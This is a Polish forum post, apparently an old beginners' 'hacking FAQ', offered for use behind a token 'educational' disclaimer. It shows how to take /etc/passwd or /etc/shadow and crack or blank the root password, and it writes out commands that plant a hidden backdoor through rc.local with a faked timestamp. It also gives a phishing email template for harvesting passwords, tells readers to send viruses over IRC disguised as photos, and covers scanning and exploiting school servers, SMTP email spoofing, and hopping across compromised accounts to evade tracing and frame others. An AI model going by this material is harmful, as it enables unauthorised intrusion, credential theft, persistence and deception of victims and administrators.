Witaj użytkowniku niezalgowany!
Zarejestruj się na forum uż dziś - nie będziesz widzieć żadnych reklam! |
Początkującym się sprzyda ! |
|
Początkującym się sprzyda !******************************************************** * Cel edukacyjny * * Mam nadzieje ze sie sprzyda dla początkujących * * Myśle o like moge zawsze gdzieś prztestować na waszych oczach * ******************************************************** ----------------------------------------------------------------------------------------------------------- Sory wszystkich, ale musze te bzdety napisac: Wiec ten txt zostal napisany wylacznie w celach edukacyjnych. Autor (czyli ja) nie ponosi zadnych odpowiedzialnosci za wyzadzone szkody po przeczytaniu tego faqa!!! ----------------------------------------------------------------------------------------------------------- Dobra, oto spis tresci: 1. Wstep 2. Linux 2.1 komendy 2.2 powloki 2.3 hasla by arenus 2.4 backdoor 3. Hacking 3.1 poczatek 3.2 sposoby 3.2.1 Social Engeneering 3.2.2 scaning 3.2.3 exploity 3.2.4 trojany 3.3 fakemail 3.4 Jak wlamac sie bezpiecznie by Kozaczonko 4. PRZEMYSLENIA. 5. Zakonczenie 1. Wstep W sumie wszystko co chcialem tutaj napisac jest w przemysleniach. Moze poza tym, ze wiekszosc rzeczy ktore tutaj przeczytacie nie sa niczym wielce odkrywczym. Poprostu chcialem zrobic kolejny poradnik dla poczatkujacych + moje wlasne przemyslenia na temat hackingu. Txt ten jest wczesna wersja, wiec czekam na opinie. Zycze milej lektury. 2. Linux Na poczatku co to jest wogole Linux (dla wiecie kogo). Linux to system operacyjny napisany przez finskiego studenta Linusa Torvalds'a w 1991 roku na podstawie niesmiertelnego Unixa. Jest to system wielozadanowy (mozesz startnac kilka prockow naraz), wielodostepny (moze pracowac na nim wielu uzytkownikow), obsluguje prawie wszystkie protokoly sieciowe niskiegi i wyzszego poziomu. Jest napisany w calosci w C, dzieki czemu mozna go uruchomic na wielu platformach np. i386, PowerPC, Motoroli, Alphie itd. Ze wzgledu ze jest miliard razy stabilniejszy od win$itow jest swietny jako platforma serwerow. 2.1 komendy dir/ls - wyswietla katalog cat - wyswietla zawartosc pliku telnet - uruchamia telnet ftp - uruchamia program do ftp id - identyfikacja uzytkownika finger - pokazuje uzytkownikow echo - pisze cos na urzadzeniu kill - zabija proces su - logowanie jako super-user pico - prosty edytor mc - rodzaj nakladki na shella chown - zmienia wlasciciela pliku irc - uruchamia klienta IRC fdisk - formatuje dyski adduser - dodaje uzytkownika rm - kasuje plik cp - kopioje plik ln - zwiazuje pliki chfi - zmienia dane uzytkownika startx - uruchamia GUI (interfejs graficzny) mail to: - wysyla poczte mount - montowanie partycii, dyskow, FDD, CD-ROM itp. man - opis wybranej komendy wpisz man nazwa_komendy 2.2 powloki sh - poczatkowa, zwana "Bourne shell" nie oferuje zbyt wielu dzialan jakich mozna wymagac od powloki takich chocby jak edycja wiersza polecenksh - "Korn shell" dosyc popularna powloka dawniej byla dostepna w konkretnych wersjach Unixacsh - "C shell" byl pierwsza powloka oferujaca kontrole procesow oraz historie polecenbash - "Bourne Again shell" najpopularniejsza powloka, jest domysna wiekszosci dystrybucji Linuxa. zsh - jest to najnowsza powloka kompatybilna z "Bourne shell"2.3 hasla logowanie w Linuxsie wyglada zazwyczj tak: alpha login: jasio Password: gdzie, alpha to nazwa komputera Oczywicie, ze moze zamiast login (Login), pojawic sie Username (username), a Password moze byc pisane z malej litery (password). Zwyczajowo (?), przyjelo sie ze login sklada sie tylko z malych liter, zazwyczaj od 3 do 8, za to haslo jest juz kombinacja malych i duzych liter, oraz cyfr znakow specjalnych (?) (3-8) np: Zs23dU czy lajeT8. Standardowo mozna sie zalogowac jako: root, sys, bin, trouble, deamon, uucp, nuucp, rje, lp, adm... Hasla takie sa kodowane i sprawdzane z haslami w pliku /etc/passwd czy /etc/shadow, ta wlasnie metode wykorzystuja wszelkiej masci hackerzy ;-> Oto przykladowy plik /etc/passwd przy wylaczonym shadowingu, bardzo nas, hackerow interesujacy!!!! # cat /etc/passwd root:Erre5ffKllg9o:0:0:root:/root:/bin/bash bin:*:1:1:bin:/bin: daemon:*:2:2:daemon:/sbin: adm:*:3:4:adm:/var/adm: lp:*:4:7:lp:/var/spool/lpd: sync:*:5:0ync:/sbin:/bin/sync shutdown:*:6:0hutdown:/sbin:/sbin/shutdown halt:*:7:0:halt:/sbin:/sbin/halt mail:*:8:12:mail:/var/spool/mail: news:*:9:13:news:/var/spool/news: uucp:*:10:14:uucp:/var/spool/uucp: operator:*:11:0:operator:/root: games:*:12:100:games:/usr/games: gopher:*:13:30:gopher:/usr/lib/gopher-data: ftp:*:14:50:FTP User:/home/ftp: nobody:*:99:99:Nobody:/: jasio:78P1IBwerttPk:500:500:Jasio Jaskowski:/home/jasio:/bin/bash halinka:IO06GpLrt8yLN:501:501:Halinka z Lublinka:/home/halinka:/bin/bash [...] # czyli: login:password:uid:gid:comment:homehell Pierwsza pozycja okresla login stosowany przy logowaniu do systemu, nastepnie jest zakodowane haslo (jesli jest puste, to przy wpisywaniu hasla podczas logowania wystarczy wcisnac enter!), trzecie pole to tkz. User Id (UID), czwarte pole to Group Id (GID), piate pole, to pole opisu, nastepne wskazuje na katalog domowy uzytkownika, a ostatnie na powloke. Tak zas wyglada plik /etc/password z wlaczonym shadowingiem, hasla sa wtedy przechowywane w pliku /etc/shadow!!! # cat /etc/shadow root:x:0:0:root:/root:/bin/bash [...] jasio:x:500:500:Jasio Jaskowski:/home/jasio:/bin/bash halinka:x:501:501:Halinka z Lublinka:/home/halinka:/bin/bash # Teraz z kolei (przy wlaczonym shadwingu) interesuje nas plik /etc/shadow ! Twoim glownym zadaniem jako hackera jest zdobycie hasla root'a, co pociaga za soba zdobycie pliku z haslami /etc/passwd lub /etc/shadow! Gdy uda Ci sie juz to zdobyc, musisz zaopatrzyc sie (lub samemu zrobic) plik ze slownikiem oraz program do kodowania/sprawdzania. Program taki bierze wyraz ze slownika, koduje go i porownuje tak zakodowane slowo ze slowem w pliku z haslami. Dobry slownik powinien miec okolo 30-40MB!!! Mozna tez, jesli ci sie uda zmienic wiersz z haslem root'a na root::0:0::: i wystarczy teraz: login: root Password: # passwd Enter password: New password: Rep. password: # i my szalejemy, a prawdziwy root placze ;-> Po prawidlowym zalogowaniu ukarze nam sie, $ lub #, czyli Unix'owski prompt (warto zauwazyc, ze bardzo czest znak $ zarezerwowany jest dla prostego uzytkownika, a znak # tylko dla root'a). Znalezlismy sie w PRAWDZIWYM (nie jakies windowsy'95 czy NT systemie operacyjnym. 2.4 backdoor for Linux Jezeli masz juz haslo roota to dobrze by bylo postawic backdoora, czyli (for lama) program ktory binduje na jakims porcie i czeka na polaczenie. Skad go wziasc??? Sciagnac z netu. Jest tam w ch*j tego. Jak go zalozyc??? Oto przyklad: root@localhost~# gcc backdoor.c -o .me root@localhost~# rm backdoor.c;cp .me /etc root@localhost~# touch -r /bin/bash /etc/.me --------> powoduje to ze /etc/.me dostaje taka date dostepu jak /bin/bash root@localhost~# echo "/etc/.me&" >> /etc/rc.d/rc.local ---------> dopisuje backdoora to pliku rc.local komendy w nim zapisane wykonywane sa przy kazdym starcie systemu Wiecej na temat backdoorow w innych faqach. 3.Hacking Wszyscy wiedza o co chodzi (jak nie wiesz to blagam wyrzuc ten txt do kosza i sformatuj twardziela!!!), wiec przejde odrazu do nastepnego podpkt.: 3.1 poczatek Podstawowa umiejetnoscia hackera jest programowanie. Najlepiej zaczac od c++. Dla hackera wazny jest takze perl oraz python. Jezeli chodzi o system operacyjny to Linux jest najlepszym rozwiazaniem dlatego ze jest tani (dystrybucja z jaks gazeta np. LinuxPlus kosztuje ok. 30zl), stabilny, dostarczny jest z wieloma kompilatorami (np. C++). Na poczatku bedziesz mial problemy z zmiana srodowiska z windows na Linux, ale to mija i potem zaczyna sie prawdziwa zabawa. Musisz takze czytac wp***u roznych faqow. Po kilkunastu lekturach zobaczysz jak wiele bedziesz umial. Wiecej narazie niechce mi sie tutaj pisac. 3.2 sposoby 3.2.1 Social Engeneering W wolnym tlumaczeniu oznacza to robienie ludzi w bambucho aby uzyskac od nich poufne dane np. hasla.Wiekszosc ludzi jest naiwna, a nawet bardzo glupia i to nalezy wykorzystac w tego rodzaju ataku. Najczesciej dokonuje sie tego przez telefon, e-mail lub na irc, gdyz ofiara nie moze domyslec sie z kim na prawde ma do czynienia. Jednym z najprostszych sposobow jest wyblaganie hasla od jakiejs glupiej panienki na irc. Mowisz, ze odetna ci dostep i takie bzdety, i niektore lykaja takie kity. Ale przeciez nie tylko do tego to moze sluzyc, ludzie sa tak naiwni, ze podadza ci nawet przez telefon swoj numer karty kredytowej, tajne hasla, i bardzo wazne numery telefonow.Wystarczy miec tylko wyobraznie i gadane.(powerfaq). Oto przyklad e-maila: ----CUT HERE--- from: rcpt to: subject: Uwaga!!! Zmiany w systemie !!! Uprzejmie informujemy uzytkownikow serwera serwer.pl,ze z dniem 20.03.2001 wprowadzony zostanie do uzytku nowy system kryptowania hasel w standardzie "IBM-DES IV", dzieki czemu zwiekszy sie bezpieczenstwo naszego serwera.Jako ze hasla w /etc/shadow sa w postaci zakodowanej ,uprasza sie uzytkownikow o przeslanie SWOICH hasel na adres www-admin@serwer.pl w celu sprawdzenia ich zgodnosci z nowymi zakodowanymi wpisami.Niezastosowanie sie do powyzszego moze (z powodu niekompatybilnosci DES II z DES IV) uniemozliwic korzystanie z konta www po 04.04.2001.Za wszelkie niedogodnosci przepraszamy. Administrator serwera Jaroslaw "pedzio" Piastka www-admin@serwer.pl ---CUT HERE--- Jezeli chcesz np. wyslac komus wira przez irca to zagadujesz go, a potem pytasz sie czy niechce twojego zdjecia i ze wyslesz je jako exe. Wybierasz z menu Dcc>send i wysylasz vira i sie cieszysz. Social to podstawowa metoda i najlepiej abys sam cos wymyslil!!! 3.2.2 scaning Wiec tak. Najpierw wybieramy sobie cel. Najlepiej jakis slabo zabezbieczony serwer (z doswiadczenia wiem ze najlepsze na poczatek sa serwery szkolne lub akademickie). Najpierw sprawdzamy czy udostepniony jest telnet, czyli czy mozna polaczyc sie z portem 23 (for lama: w trybie textowym Linuxa wpisujemy telnet adres.ofiary.pl 23 i wciskamy ENTER). Jak nie ma to probujemy ssh (port 22). Jak sie polaczy to sprawdzamy na jakim systemie pracuje. Teraz musimy sobie zalatwic jakiegos scnarea pod Linuxa np. nmap. Odpalamy go wpisujac nmap [opcja] www.adres.ofiary.pl. Po chwili wyskoczy ci jakie porty sa aktywne. Teraz idzie juz z gorki. Telnetujemy sie na jakis aktywny port. Sprawdzamy wersje sendmaila. JAk bedzie to jakis zabytek to czytamy w necie o jego bledach. Jazeli nie to sprawdzamy ftp. Po analizie serwera wchodzimy na jaka stronke z exploitami i szukamy sploita pod wskaana wersje sendmaila lub ftp. Logujemy sie na shella i wpisujemy: $cc exploit.c -oexploit $./exploit nazwa_hosta sprawdzamy kim jestesmy: #whoami root No i mamy roota!!! 3.2.3 exploity Exploit to taki program ktory daje zwyklemu usreowi prawa roota! W dziale wyzej napisalem jak go uruchomic itp. Ale zaluzmy ze mamy kono na srewerze, ale nie mozemy uruchamiac zadnych programow. Przejebane, co nie? A jednak nie bo jest na to sposob: $ gcc exploit.c $ ./a.out bash: ./a.out: Brak dostępu $ /lib/ld-linux.so.2 ./a.out I exploit chodzi!!! 3.2.4 Trojany - wg niektorych najmniej szczytna metoda wlamywania sie do komputerow, nie potrzeba do niej zadnej wiedzy.Wystarczy uruchomic klienta. Metoda ta polega na wlaczeniu serwera na innym komputerze, teraz wystarczy poznac adres IP tego komputera, jezeli jestes w sieci i Twoja ofiara tez jest polaczona, mozesz polaczyc sie z serwerem. Metoda ta jest najmniej akceptowana przez prawdziwych hackerow. Ja jednak polecam poczatkujacym. 3.3 fakemail Niby nic trudnego, ale nadal w Polsce jest wiele osob, ktore tego nie umia. - telnetuj sie na port 25 serwera, - Jezeli to mozliwe pomin "HELO" - pisz: mail from: (i tu swoj adres e-mailowy, niekoniecznie prawdziwy - pisz: rcpt to: (osoba do ktorej piszesz list) - server pocztowy powinien pisac ok po kazdej funkcji. - jezeli cos nie bedzie gralo sprobuj jeszcze raz, ale zacznij od "HELO nikt" - pozniej wpisz: data i wcisnij ENTER - wpisz zawartosc listu - na koncu napisz: . -i: quit I tyle. 3.2 JAK SIE WLAMAC BEZPIECZNIE : lcamtuf Na podstawie swoich doswiadczen moge wam powiedziec jak bezpiecznie sie wlamac - kiedy po prostu wejdziesz przez telnet na serwer to w logach zostanie zanotowane "angel@dial003.zigzag.pl". Oto co mozna zrobic nie majac nigdzie roota ani nie bawiac sie w czyszczenie logow: 0) Po zerowe - oczywiscie korzystaj z dial-upu TPSa :-) 1) Znajdujesz 2-3 serwery i rozkodowujesz okolo 4-5 kont na kazdym. Najlepiej, zeby byly to serwery w roznych krajach, np. Hong-Kong i Polska. Powiedzmy, ze mamy takie serwery: X.com, Y.com, Z.com, ofiara.com oraz nastepujace konta: X1, X2, X3, X4, Y1, Y2, Y3..., Z1, ofiara 2) Logujesz sie na X.com jako X1, wysylasz tam "nowa" wersje strony. Pozniej przez telnet z tego konta wpisujesz "ftp Y.com" i tam logujesz sie jako "Y1"... UWAGA: Fizycznie jestes caly czas podlaczony do X.com !!! Wysylasz na Y1 pliki. Pozniej wpisujesz na koncie X1 "telnet Y.com" i piszesz "ftp X.com" i logujesz sie jako X2. Powtarzasz wszystko dla konta X2... I tak kilka razy - zajmie to z 10 razy wiecej czasu, ale zaraz zobaczysz w czym tkwi kruczek. Caly czas jestes fizycznie polaczony tylko z X.com i zalogowany na koncie X1, a plik jest juz na serwerze Y.com na koncie Y4 :-) 3) Po kilku petelkach mozesz wyslac jeszcze wszystko wrzucic na Z.com i stamtad dopiero (bedac caly czas zalogowany na X jako X1 !!!) wpisac "ftp ofiara.com" i zastapic oryginalne pliki nowymi. Pozniej wycofujesz sie kasujac za soba pliki... Najlepiej jeszcz miec roota na jednym z tych serverow i zatrzec za soba slady powiedzmy tak w polowie wyksowywujac sie z logow. I co teraz? Admin serwera ofiara.com patrzy w logi i widzi "Z1@Z.com". Pisze wiec do root@Z.com ze ten gosciu sie wlamal. Voila. Z1 idzie na spytki! Ale moze sie okazac, ze cala afera sie wyjasni i admin Z bedzie probowal szukac dalej. Zajrzy do logow i zobaczy, ze na to konto logowal sie "Y4@Y.com". Wysle wiec odpowiedni list do root@Y.com (hmmm, za granica, wiec admin musi sie niezle narobic). Ten zas powtorzy caly scenariusz, po czym skapuje sie, ze logowal sie u niego "X4@X1.com". Napisze wiec do root@X.com (znowu za granice, bo do Polski). Ten znowu powtorzy caly scenariusz i znowu napisze do roota serwera2, ze to przeciez "Y3@Y.com" sie u niego logowal :-) Nie ma szans, zeby admini sie jakos dogadali, zwlaszcza gdy jeden z serwerow jest poza krajem. W sumie tyle zamieszania, ze na 100% admini sie nie dogadaja, a jak sie nawet dogadaja, to minie pol roku zanim dojda do tego, ze logowal sie gosciu "noname@ppp2-cst222.warszawa.tpnet.pl"... I co? Nic... Jesli beda bardzo uparci, to wysla podanie do TPSa o ujawnienie wykazow bilingowych. Minie kilka miesiecy zanim podanie zostanie rozpatrzone, a po tym czasie wykazy TePSy beda juz od wielu miesiecy na wysypisku... Hehehe. Zdarza sie czasem, ze TPSA dziala szybciej i biling ujawnia w niedlugim czasie, ale to musieli byscie juz niezle namieszac. Poza tym przewaznie na TPSA wisi 100 - 200 modemow, wiec taki biling to nie do konca jest dowod (chyba ze na serverze siedziales kilka godzin). Dlatego trzeba dzialac szybko. 4. Przemyslenia Nie mam tutaj zamiaru kolejny raz definicji slowa 'hacker', bo byloby to bez sensu. Wiec przejdzmy od razu do rzeczy. Kim jest hacker? Hacker w powszechnym miemaniu jest to osoba ktora wlamuje sie poto aby zniszczyc dane. Kim hacker jest dla mnie? Hacker jest osoba inteligentna. Wlamuje sie tylko poto aby udowodnic ze nie ma zabezpieczen idealnych. Nigdy poto aby niszczyc dane.Prawdziwy hacker dazy do jak najwiekszej wiedzy. Mozna powiedziec ze daza do wszechwiedzy. Sa takze cierpliwi. Musza wkoncu nieraz czekac po kilka dni zanim zlamia haslo. Czy ja jestem hackerem??? Nie. Dlaczego??? Poniewaz nie jest sie hackerem dopoty dopoki inni hackerzy nie zaczna nazywac ciebie hackerem. 5. The End Na konie pragne zaznaczyc ze napisanie tego faqu zajelo mi ok. 1h wiec sory za bledy. ***************************************** |
|
« Starszy wątek | Nowszy wątek »
|
Użytkownicy przeglądający ten wątek: |
3 gości |